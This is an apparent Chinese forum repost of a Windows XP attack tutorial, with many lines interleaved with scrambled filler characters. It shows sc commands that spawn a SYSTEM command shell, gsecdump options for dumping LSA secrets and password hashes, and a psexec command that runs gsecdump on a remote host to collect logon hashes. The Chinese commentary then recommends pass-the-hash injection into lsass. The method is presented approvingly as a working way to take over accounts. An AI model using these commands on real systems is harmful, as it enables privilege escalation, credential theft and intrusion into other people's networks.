o get a DOS Prompt as NT system:
8 w1 |+ i1 R! m, I2 t, j& _6 N
3 T2 K) N0 b& o( f8 y& ] dC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact! ~- V- [7 e, N
[SC] CreateService SUCCESS
# A7 j/ U% k8 \% W, G
6 [% v$ A, x; d2 a& m; A. sC:\>sc start shellcmdline
) O" s2 E, O8 m7 A- G- j[SC] StartService FAILED 1053:
% M6 Z0 d- C3 ?& _: C% R$ X) L8 L8 R9 x1 [1 t
The service did not respond to the start or control request in a timely fashion.
$ g9 g N5 a1 I* Y
: O( s$ d& [( hC:\>sc delete shellcmdline# h- y3 k' _# N0 Y1 e& Z5 b$ u a9 t
[SC] DeleteService SUCCESS
]4 V/ v6 O. C! A' E; w8 m ^7 o6 ]; ~! t
------------
! @6 M, w& I: w# D( ]0 |' y" x. J. ^/ b- T! w
Then in the new DOS window:/ k. l' |& w$ Q6 o+ {
6 ? x( e/ ?3 M5 w) \9 n6 `/ L, DMicrosoft Windows XP [Version 5.1.2600]
3 p* {6 R2 [+ o" X$ z5 Y8 p(C) Copyright 1985-2001 Microsoft Corp.: O" _ P+ P, `$ d- z- E
0 t. j" L0 D2 B% g, {) b: g! S
C:\WINDOWS\system32>whoami' L. P2 D( \; N7 M' {/ @. A
NT AUTHORITY\SYSTEM4 T9 j! g4 S) }/ j) ~& S
: F; L3 @; p" E% t, t# r$ V2 A
C:\WINDOWS\system32>gsecdump -h
. D0 k: N0 v/ d- Rgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se), q& g, \* u a2 T0 K
usage: gsecdump [options]
% w$ v. n6 O% X3 j/ K6 j: s7 x. v5 h+ C9 j5 m# P# `
options:- h$ @5 s A; e" D* Y7 O
-h [ --help ] show help
7 N M) l% g* y% Q" Q-a [ --dump_all ] dump all secrets
7 i( d1 C0 g8 J* W" `( x% z-l [ --dump_lsa ] dump lsa secrets1 Z3 X0 O' h% |
-w [ --dump_wireless ] dump microsoft wireless connections
" ]( ^. ]! j; e, i- D-u [ --dump_usedhashes ] dump hashes from active logon sessions
/ S C- b3 M! W6 l u) | d-s [ --dump_hashes ] dump hashes from SAM/AD
2 t6 k* ~' m% d9 A4 _% p# c+ t# G5 m3 t4 ~4 L% S3 q b( }
Although I like to use:
, ~7 U' B, R& Y; y i9 M. [: J1 M7 A W$ R( d7 l8 x) a' r
PsExec v1.83 - Execute processes remotely
M) g6 l2 [+ N+ y2 }8 ^Copyright (C) 2001-2007 Mark Russinovich
: o0 Z$ w# J; |+ A1 FSysinternals - 链接标记[url]www.sysinternals.com[/url]
- C% m0 m# _! [! u3 B
) w8 h. |% X9 C& lC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT7 \) y1 L: J+ c ]/ K
7 r" @* ?+ ^" Z% qto get the hashes from active logon sessions of a remote system.' {. V) q4 N p0 K
; R; H) x# i4 |& U- l
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.# _: H; F3 a. H7 S* b
0 e0 L& C6 A" V1 w: {$ M提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了./ o5 u7 w$ v4 x d+ h! F
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]3 q H2 V) ~) c; h
; J" a8 w; m6 l* k9 |$ {5 n f
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。- B5 i3 ?7 {2 D5 x) f" o/ S
|
发表于 2012-11-6 21:09:29
收藏
支持
反对